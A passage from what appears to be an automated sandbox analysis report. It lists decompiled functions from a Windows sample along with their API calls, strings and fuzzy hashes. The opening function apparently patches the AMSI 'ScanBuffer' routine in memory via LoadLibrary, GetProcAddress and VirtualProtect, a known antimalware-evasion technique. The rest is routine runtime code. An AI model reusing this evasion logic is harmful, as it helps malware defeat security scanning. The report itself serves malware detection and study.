0x0000ffff) - 1; 				if(_t156 >= 0) { 					_t157 = _t156 + 1; 					 *0x466644 = 0; 					do { 						_push(_t213); 						_t241 =  *0x466644 +  *0x466644 * 4; 						_t125 =  *0x466640; // 0x2666460 						_t42 = _t241 * 8; // 0x60000020 						_t127 = E0045EC64( *((intOrPtr*)(_t125 + _t42 + 0x24)), _t231); 						_t128 =  *0x466640; // 0x2666460 						_t45 = _t241 * 8; // 0x10550 						_t130 =  *0x466640; // 0x2666460 						_t48 = _t241 * 8; // 0x1000 						VirtualProtect( *((intOrPtr*)(_t130 + _t48 + 0xc)) +  *0x466630,  *(_t128 + _t45 + 8), _t127, 0x4666a4); // executed 						 *0x466644 =  *0x466644 + 1; 						_t157 = _t157 - 1; 					} while (_t157 != 0); 				} 				_t115 =  *0x4666a8; // 0x738c0000 				FreeLibrary(_t115); 				 *0x466658( *0x466630, 1, 0, 0x1d, 0xd, 0xd); // executed 				_pop(_t232); 				 *[fs:eax] = _t232; 				_push(0x45f207); 				E00404760( &_v24, 3); 				return E0040473C( &_v8); 			}                        


                                                                            APIs
                                                                              • Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                              • Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                              • Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,0000001D), ref: 0045EFEB
                                                                            • VirtualAlloc.KERNEL32(-00465630,00000010,00001000,00000004,?,?,?,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F0B5
                                                                            • VirtualProtect.KERNEL32(-00465630,00010550,00000000,004666A4,?,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001), ref: 0045F1AB
                                                                            • FreeLibrary.KERNEL32(738C0000,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F1C8
                                                                            Strings
                                                                            • ScanBuffer , xrefs: 0045EF66
                                                                            • Msi , xrefs: 0045EF1F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Virtual$AllocLibrary$AddressFreeHandleLoadModuleProcProtect
                                                                            • String ID: Msi$ScanBuffer
                                                                            • API String ID: 2006266006-3561555771
                                                                            • Opcode ID: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316
                                                                            • Instruction ID: f50dc9b62a688634fe35a12e90ff385b065f388c4a73e1f7ea8b28ac3d343785
                                                                            • Opcode Fuzzy Hash: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316
                                                                            • Instruction Fuzzy Hash: 86A17B716902819FE314DF48EC86F3173A8FB45709F21543FFA51DB2A2E6F4A8058E99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                                                                                  E004543D8(char __edx, void* __edi) { 				char _v5; 				void* __ebx; 				void* __ecx; 				void* __ebp; 				intOrPtr _t25; 				intOrPtr* _t28; 				intOrPtr* _t29; 				intOrPtr* _t48; 				intOrPtr _t59; 				intOrPtr _t60; 				intOrPtr _t61; 				intOrPtr _t62; 				intOrPtr _t65; 				void* _t66; 				char _t67; 				void* _t77; 				struct HDC__* _t78; 				void* _t79; 				void* _t80;  				_t77 = __edi; 				_t67 = __edx; 				if(__edx != 0) { 					_t80 = _t80 + 0xfffffff0; 					_t25 = E00403C34(_t25, _t79); 				} 				_v5 = _t67; 				_t65 = _t25; 				E00420664(_t66, 0); 				_t28 =  *0x462b90; // 0x461bb8 				 *((intOrPtr*)(_t28 + 4)) = _t65; 				 *_t28 = 0x45477c; 				_t29 =  *0x462ba0; // 0x461bc0 				 *((intOrPtr*)(_t29 + 4)) = _t65; 				 *_t29 = 0x454788; 				E00454794(_t65); 				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0); 				 *((intOrPtr*)(_t65 + 0x4c)) = E004038F8(1); 				 *((intOrPtr*)(_t65 + 0x50)) = E004038F8(1); 				 *((intOrPtr*)(_t65 + 0x54)) = E004038F8(1); 				 *((intOrPtr*)(_t65 + 0x58)) = E004038F8(1); 				 *((intOrPtr*)(_t65 + 0x7c)) = E004038F8(1); 				_t78 = GetDC(0); 				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a); 				ReleaseDC(0, _t78); 				_t11 = _t65 + 0x58; // 0x44c77c6e 				_t48 =  *0x462d20; // 0x46632c 				 *((intOrPtr*)( *_t48))(0, 0, E0045022C,  *_t11); 				 *((intOrPtr*)(_t65 + 0x84)) = E004256F8(1); 				 *((intOrPtr*)(_t65 + 0x88)) = E004256F8(1); 				 *((intOrPtr*)(_t65 + 0x80)) = E004256F8(1); 				E00454BC4(_t65, _t65, _t66, _t77); 				_t15 = _t65 + 0x84; // 0x38004010 				_t59 =  *_t15; 				 *((intOrPtr*)(_t59 + 0xc)) = _t65; 				 *((intOrPtr*)(_t59 + 8)) = 0x454a94; 				_t18 = _t65 + 0x88; // 0x90000000 				_t60 =  *_t18; 				 *((intOrPtr*)(_t60 + 0xc)) = _t65; 				 *((intOrPtr*)(_t60 + 8)) = 0x454a94; 				_t21 = _t65 + 0x80; // 0xcc000000 				_t61 =  *_t21; 				 *((intOrPtr*)(_t61 + 0xc)) = 
_t65; 				 *((intOrPtr*)(_t61 + 8)) = 0x454a94; 				_t62 = _t65; 				if(_v5 != 0) { 					E00403C8C(_t62); 					_pop( *[fs:0x0]); 				} 				return _t65; 			}                        


                                                                            APIs
                                                                            • GetKeyboardLayout.USER32 ref: 0045441D
                                                                            • GetDC.USER32(00000000), ref: 00454472
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C
                                                                            • ReleaseDC.USER32 ref: 00454487
                                                                            Strings
                                                                            • $BB , xrefs: 004544A5, 004544B7, 004544C9
                                                                            • ,cF , xrefs: 0045449A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDeviceKeyboardLayoutRelease
                                                                            • String ID: $BB$,cF
                                                                            • API String ID: 3331096196-156580243
                                                                            • Opcode ID: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6
                                                                            • Instruction ID: 0b584d1e58491fa1ea5d4c96f00a0c4a7644df09fe4235dac3e087649deaa05e
                                                                            • Opcode Fuzzy Hash: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6
                                                                            • Instruction Fuzzy Hash: 9C31D7716042419FD740EF69D8C5B487BE4FB05319F4580BAF818DF3A3EB79A8489B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E00454BC4(void* __eax, void* __ebx, void* __ecx, void* __edi) { 				signed char _v5; 				struct tagLOGFONTA _v65; 				struct tagLOGFONTA _v185; 				struct tagLOGFONTA _v245; 				void _v405; 				void* _t23; 				int _t27; 				void* _t30; 				intOrPtr _t38; 				struct HFONT__* _t41; 				struct HFONT__* _t45; 				struct HFONT__* _t49; 				intOrPtr _t52; 				intOrPtr _t54; 				void* _t57; 				intOrPtr _t66; 				void* _t72; 				void* _t74; 				void* _t75; 				intOrPtr _t76;  				_t72 = __edi; 				_t74 = _t75; 				_t76 = _t75 + 0xfffffe6c; 				_t57 = __eax; 				_v5 = 0; 				if( *0x466580 != 0) { 					_t54 =  *0x466580; // 0x26df470 					_v5 =  *(_t54 + 0x88) & 0x000000ff; 				} 				_push(_t74); 				_push(0x454d0b); 				_push( *[fs:eax]); 				 *[fs:eax] = _t76; 				if( *0x466580 != 0) { 					_t52 =  *0x466580; // 0x26df470 					E00457684(_t52, 0); 				} 				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) { 					_t23 = GetStockObject(0xd); 					_t7 = _t57 + 0x84; // 0x38004010 					E00425B48( *_t7, _t23, _t72); 				} else { 					_t49 = CreateFontIndirectA( &_v65); // executed 					_t6 = _t57 + 0x84; // 0x38004010 					E00425B48( *_t6, _t49, _t72); 				} 				_v405 = 0x154; 				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed 				if(_t27 == 0) { 					_t14 = _t57 + 0x80; // 0xcc000000 					E00425C2C( *_t14, 8); 					_t30 = GetStockObject(0xd); 					_t15 = _t57 + 0x88; // 0x90000000 					E00425B48( *_t15, _t30, _t72); 				} else { 					_t41 = CreateFontIndirectA( &_v185); 					_t11 = _t57 + 0x80; // 0xcc000000 					E00425B48( *_t11, _t41, _t72); 					_t45 = CreateFontIndirectA( &_v245); 					_t13 = _t57 + 0x88; // 0x90000000 					E00425B48( *_t13, _t45, _t72); 				} 				_t16 = _t57 + 0x80; // 0xcc000000 				E004258CC( *_t16, 0xff000017); 				_t17 = _t57 + 0x88; // 0x90000000 				E004258CC( *_t17, 0xff000007); 				_pop(_t66); 				 
*[fs:eax] = _t66; 				_push(0x454d12); 				if( *0x466580 != 0) { 					_t38 =  *0x466580; // 0x26df470 					return E00457684(_t38, _v5 & 0x000000ff); 				} 				return 0; 			}                        


                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454C19
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C26
                                                                            • GetStockObject.GDI32(0000000D), ref: 00454C3C
                                                                              • Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39
                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454C65
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C75
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C8E
                                                                            • GetStockObject.GDI32(0000000D), ref: 00454CB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                            • String ID:
                                                                            • API String ID: 2891467149-0
                                                                            • Opcode ID: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96
                                                                            • Instruction ID: 0f587122efedf7d321ac9ee3614aa9c37689806316be6897d166c53c05cdaab1
                                                                            • Opcode Fuzzy Hash: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96
                                                                            • Instruction Fuzzy Hash: 3131D6307042109BEB10EB65DC42B9937E4AB84309F4140B7FD48DB29BEA789848872D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
                                                                                                                                  E0042AD08(void* __ebx, void* __esi) { 				char _v8; 				intOrPtr _v12; 				int _t12; 				intOrPtr* _t15; 				void* _t22; 				void* _t33; 				intOrPtr _t40; 				void* _t43; 				void* _t45; 				void* _t46; 				intOrPtr _t47;  				_t43 = __esi; 				_t33 = __ebx; 				_t45 = _t46; 				_t47 = _t46 + 0xfffffef8; 				_v8 = 0; 				_push(_t45); 				_push(0x42ae0b); 				_push( *[fs:eax]); 				 *[fs:eax] = _t47; 				_t12 =  *0x466354; // 0x60 				 *0x461c30 =  ~(MulDiv(8, _t12, 0x48)); 				_t15 =  *0x462f2c; // 0x4617c0 				if( *_t15 == 1 && E0042ACC4() == 0x80) { 					E004047D4( &_v8, "Tahoma"); 				} 				_v12 = E00423918(1); 				_push(_t45); 				_push(0x42adc3); 				_push( *[fs:eax]); 				 *[fs:eax] = _t47; 				E004239B8(_v12, 0x80000002); 				_t22 = E00423A1C(_v12, _t33, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", _t43); // executed 				_t50 = _t22; 				if(_t22 != 0) { 					E00423C4C(_v12,  &_v8, "MS Shell Dlg 2", _t50); 					E00423988(_v12); 				} 				_pop(_t40); 				 *[fs:eax] = _t40; 				_push(0x42adca); 				return E00403928(_v12); 			}                        


                                                                            APIs
                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0042AD2E
                                                                              • Part of subcall function 0042ACC4: GetDC.USER32(00000000), ref: 0042ACCD
                                                                              • Part of subcall function 0042ACC4: SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF
                                                                              • Part of subcall function 0042ACC4: GetTextMetricsA.GDI32(00000000), ref: 0042ACEA
                                                                              • Part of subcall function 0042ACC4: ReleaseDC.USER32 ref: 0042ACFB
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes , xrefs: 0042AD84
                                                                            • MS Shell Dlg 2 , xrefs: 0042AD98
                                                                            • Tahoma , xrefs: 0042AD50
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                            • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                            • API String ID: 2013942131-1011973972
                                                                            • Opcode ID: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1
                                                                            • Instruction ID: 9d3ea1dbbf15434387875305194268bf5b9a98b32bb9e77b65e1f96db536e4fd
                                                                            • Opcode Fuzzy Hash: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1
                                                                            • Instruction Fuzzy Hash: 2211D370700114AFC710DF65E80195D7BB6EB0A304FD14076F800A7BA1DB7D9E22871A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                                                                                  E004217E0(intOrPtr _a4, short _a6, intOrPtr _a8) { 				struct _WNDCLASSA _v44; 				struct HINSTANCE__* _t6; 				CHAR* _t8; 				struct HINSTANCE__* _t9; 				int _t10; 				void* _t11; 				struct HINSTANCE__* _t13; 				struct HWND__* _t15; 				long _t17; 				struct HINSTANCE__* _t19; 				CHAR* _t20; 				struct HWND__* _t22; 				CHAR* _t24;  				_t6 =  *0x4657f8; // 0x400000 				 *0x461c04 = _t6; 				_t8 =  *0x461c18; // 0x4217d0 				_t9 =  *0x4657f8; // 0x400000 				_t10 = GetClassInfoA(_t9, _t8,  &_v44); 				asm("sbb eax, eax"); 				_t11 = _t10 + 1; 				if(_t11 == 0 || L00406E54 != _v44.lpfnWndProc) { 					if(_t11 != 0) { 						_t19 =  *0x4657f8; // 0x400000 						_t20 =  *0x461c18; // 0x4217d0 						UnregisterClassA(_t20, _t19); 					} 					RegisterClassA(0x461bf4); 				} 				_t13 =  *0x4657f8; // 0x400000 				_t24 =  *0x461c18; // 0x4217d0 				_t15 = E0040730C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed 				_t22 = _t15; 				if(_a6 != 0) { 					_t17 = E00421724(_a4, _a8); // executed 					SetWindowLongA(_t22, 0xfffffffc, _t17); 				} 				return _t22; 			}                        


                                                                            APIs
                                                                            • GetClassInfoA.USER32 ref: 00421801
                                                                            • UnregisterClassA.USER32 ref: 0042182A
                                                                            • RegisterClassA.USER32 ref: 00421834
                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0042187F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 4025006896-0
                                                                            • Opcode ID: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf
                                                                            • Instruction ID: 027158a3b90695bcfb74c3b3aa95824c4aefdb47031e860d546c877da2bcb83e
                                                                            • Opcode Fuzzy Hash: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf
                                                                            • Instruction Fuzzy Hash: 52016171B44105ABCB00FBA9EC81F9A3399E718314F144136F914E73F1EA79A88187AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                                                                                  E00423A1C(void* __eax, void* __ebx, void* __edx, void* __esi) { 				char _v8; 				char _v9; 				void* _v16; 				char* _t61; 				signed int _t64; 				char* _t67; 				signed int _t70; 				char* _t73; 				signed int _t76; 				signed char _t96; 				intOrPtr _t109; 				void* _t118; 				void* _t121;  				_v8 = 0; 				_t118 = __eax; 				_push(_t121); 				_push(0x423bb6); 				_push( *[fs:eax]); 				 *[fs:eax] = _t121 + 0xfffffff4; 				E004047D4( &_v8, __edx); 				_t96 = E004238DC(_v8); 				if(_t96 == 0) { 					E00404CA0( &_v8, 1, 1); 				} 				_v16 = 0; 				_t61 = E00404C00(_v8); 				_t64 = RegOpenKeyExA(E00423A08(_t118, _t96), _t61, 0, 0x20019,  &_v16); // executed 				_v9 = _t64 == 0; 				if(_v9 == 0) { 					_t67 = E00404C00(_v8); 					_t70 = RegOpenKeyExA(E00423A08(_t118, _t96), _t67, 0, 0x20009,  &_v16); 					_v9 = _t70 == 0; 					if(_v9 == 0) { 						_t73 = E00404C00(_v8); 						_t76 = RegOpenKeyExA(E00423A08(_t118, _t96), _t73, 0, 1,  &_v16); 						_v9 = _t76 == 0; 						if(_v9 != 0) { 							 *(_t118 + 0x18) = 1; 							if(((_t76 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { 								_push( *((intOrPtr*)(_t118 + 0x10))); 								_push(E00423BD0); 								_push(_v8); 								E00404AC0(); 							} 							E004239E4(_t118, _v8, _v16); 						} 					} else { 						 *(_t118 + 0x18) = 0x20009; 						if(((_t70 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { 							_push( *((intOrPtr*)(_t118 + 0x10))); 							_push(E00423BD0); 							_push(_v8); 							E00404AC0(); 						} 						E004239E4(_t118, _v8, _v16); 					} 				} else { 					 *(_t118 + 0x18) = 0x20019; 					if(((_t64 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { 						_push( *((intOrPtr*)(_t118 + 0x10))); 						_push(E00423BD0); 						_push(_v8); 						E00404AC0(); 					} 					E004239E4(_t118, _v8, _v16); 				} 				
_pop(_t109); 				 *[fs:eax] = _t109; 				_push(E00423BBD); 				return E0040473C( &_v8); 			}                        


                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423AF3
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 00423B58
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87
                                                                            • Instruction ID: 1631747641735d97f0e726df34b4cb7d5d51ea82463f4736274f0810a2e96b2b
                                                                            • Opcode Fuzzy Hash: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87
                                                                            • Instruction Fuzzy Hash: 4E41B170B00218BBDB11DFA5E952B9EB7F9AB44304F5144BBB445B3282CB7DAF059B48
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            E0045EBB0(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
                                                                                intOrPtr _v8;
                                                                                char _v12;
                                                                                CHAR* _t24;
                                                                                struct HINSTANCE__* _t25;
                                                                                CHAR* _t28;
                                                                                intOrPtr _t33;
                                                                                intOrPtr* _t36;
                                                                                void* _t39;

                                                                                _t36 = __ecx;
                                                                                _v12 = __edx;
                                                                                _v8 = __eax;
                                                                                E00404BF0(_v8);
                                                                                E00404BF0(_v12);
                                                                                _push(_t39);
                                                                                _push(0x45ec57);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t39 + 0xfffffff8;
                                                                                0;
                                                                                _t28 = E00404C00(_v8);
                                                                                LoadLibraryA(_t28); // executed
                                                                                *0x4666a8 = GetModuleHandleA(_t28);
                                                                                if( *0x4666a8 != 0) {
                                                                                    0;
                                                                                    0;
                                                                                    _t24 = E00404C00(_v12);
                                                                                    _t25 =  *0x4666a8; // 0x738c0000
                                                                                    *_t36 = GetProcAddress(_t25, _t24);
                                                                                }
                                                                                _pop(_t33);
                                                                                *[fs:eax] = _t33;
                                                                                _push(0x45ec5e);
                                                                                return E00404760( &_v12, 2);
                                                                            }


                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                            • GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8
                                                                            • Instruction ID: d4a4c4ef2a58cf9094cbc387d8303d04bade7ed1a93cf8cbbf6f48fd4d8bd229
                                                                            • Opcode Fuzzy Hash: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8
                                                                            • Instruction Fuzzy Hash: 790140B0605244AFEB05EB76ED42A5A7BF8DB49314F12047AF504E32E2E678EE50C618
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E0040CF98() {
                                                                                signed short _t13;
                                                                                int _t17;
                                                                                signed int _t21;
                                                                                signed int _t22;
                                                                                void* _t34;
                                                                                void* _t35;

                                                                                *0x4658c8 = 0x409;
                                                                                *0x004658CC = 9;
                                                                                *0x004658D0 = 1;
                                                                                _t13 = GetThreadLocale();
                                                                                if(_t13 != 0) {
                                                                                    *0x4658c8 = _t13;
                                                                                }
                                                                                if(_t13 != 0) {
                                                                                    *0x004658CC = _t13 & 0x3ff;
                                                                                    *0x004658D0 = (_t13 & 0x0000ffff) >> 0xa;
                                                                                }
                                                                                memcpy(0x461808, 0x40d03c, 8 << 2);
                                                                                _t34 = 0x4658c8;
                                                                                if( *0x4617c4 <= 4 ||  *0x4617c0 != 2) {
                                                                                    *((char*)(_t34 + 0xd)) = GetSystemMetrics(0x4a) & 0xffffff00 | _t15 != 0x00000000;
                                                                                } else {
                                                                                    *0x0040D049 = 1;
                                                                                }
                                                                                _t17 = GetSystemMetrics(0x2a); // executed
                                                                                _t22 = _t21 & 0xffffff00 | _t17 != 0x00000000;
                                                                                *(_t34 + 0xc) = _t22;
                                                                                if(_t22 != 0) {
                                                                                    return E0040CF3C(_t35);
                                                                                }
                                                                                return _t17;
                                                                            }


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32 ref: 0040CFBA
                                                                            • GetSystemMetrics.USER32 ref: 0040D00D
                                                                            • GetSystemMetrics.USER32 ref: 0040D01C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$LocaleThread
                                                                            • String ID:
                                                                            • API String ID: 2159509485-0
                                                                            • Opcode ID: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e
                                                                            • Instruction ID: 76d1b7ec664e111f503e51dd0c1979d9023841a60a1f3c9667e84ab395d3be29
                                                                            • Opcode Fuzzy Hash: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e
                                                                            • Instruction Fuzzy Hash: F3018860A407518AD3205B6694013637AC8DB02319F08C03FE88DE73C2EB3DD846836A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E00423CC2(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
                                                                                int _v8;
                                                                                char _v12;
                                                                                char _v16;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                long _t18;
                                                                                void* _t26;
                                                                                intOrPtr _t30;
                                                                                char _t38;

                                                                                _t35 = __ecx;
                                                                                _t38 = __edx;
                                                                                _t26 = __eax;
                                                                                _v8 = 0;
                                                                                _t18 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0,  &_v8, __ecx,  &_a8); // executed
                                                                                if(_t18 != 0) {
                                                                                    _v16 = _t38;
                                                                                    _v12 = 0xb;
                                                                                    _t30 =  *0x462f48; // 0x4161b8
                                                                                    E0040C214(_t26, _t30, 1, _t35, _t38, 0,  &_v16);
                                                                                    E00404184();
                                                                                }
                                                                                *_a4 = E004238F0(_v8);
                                                                                return _a8;
                                                                            }


                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF
                                                                            Strings
                                                                            • 48B , xrefs: 00423D0D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: 48B
                                                                            • API String ID: 3660427363-1399719961
                                                                            • Opcode ID: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f
                                                                            • Instruction ID: dc9a7b025fb012292c3c1f78a1d553d82cca77016de03337154782b34ab35c11
                                                                            • Opcode Fuzzy Hash: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f
                                                                            • Instruction Fuzzy Hash: 55012175B00208BFD700EF99DC81A9AB7FCDB59314F10817AFD14DB281DA759E0487A5
                                                                            Uniqueness

